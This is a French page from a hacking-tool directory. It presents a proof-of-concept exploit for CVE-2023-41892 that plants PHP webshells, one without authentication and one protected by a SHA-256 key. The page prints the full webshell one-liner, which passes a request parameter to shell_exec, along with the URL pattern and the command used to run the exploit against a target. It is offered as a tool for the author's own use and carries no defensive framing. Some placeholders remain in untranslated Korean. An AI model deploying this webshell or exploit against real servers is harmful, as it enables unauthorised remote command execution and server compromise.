Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-41892_poc — Personnalisé pour mon propre usage | Kitploit
Outils/GitHubGitHub/user01-1/cve-2023-41892_poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebCommandement et Contrôle
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

Personnalisé pour mon propre usage

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-41892_poc

Personnalisé pour mon propre usage

poc_noauth.py

  • Webshell PHP one-liner basique
  • Exécution de commandes OS via ?cmd=<명령어>

poc_auth.py

  • Webshell avec authentification simple basée sur une clé (comparaison de hachage SHA-256)

  • L'exécution des commandes n'est possible qu'avec la bonne clé.

  • Modification de code requise :

    • Dans la fonction drop_payload, modifier la partie YOUR_SECRET_KEY de la variable webshell avec la valeur de hachage SHA-256 de la clé souhaitée.
  • Méthode d'utilisation :

    1. Remplacer YOUR_SECRET_KEY dans webshell par la valeur de hachage SHA-256 de la clé en clair.
    2. Lors de la requête, transmettre la clé en clair
      root@kitploit:~
      {target}/shell.php?k=<평문키>&c=<명령어>
      
Télécharger l’outil
  • Exemple :

    1. Configuration : clé en clair = test1234
    2. Hachage SHA256 via cyberchef ou autre : 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef, etc.
    3. Modification du code :
      root@kitploit:~
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      
  • Utilisation

    python poc_noauth.py {타겟}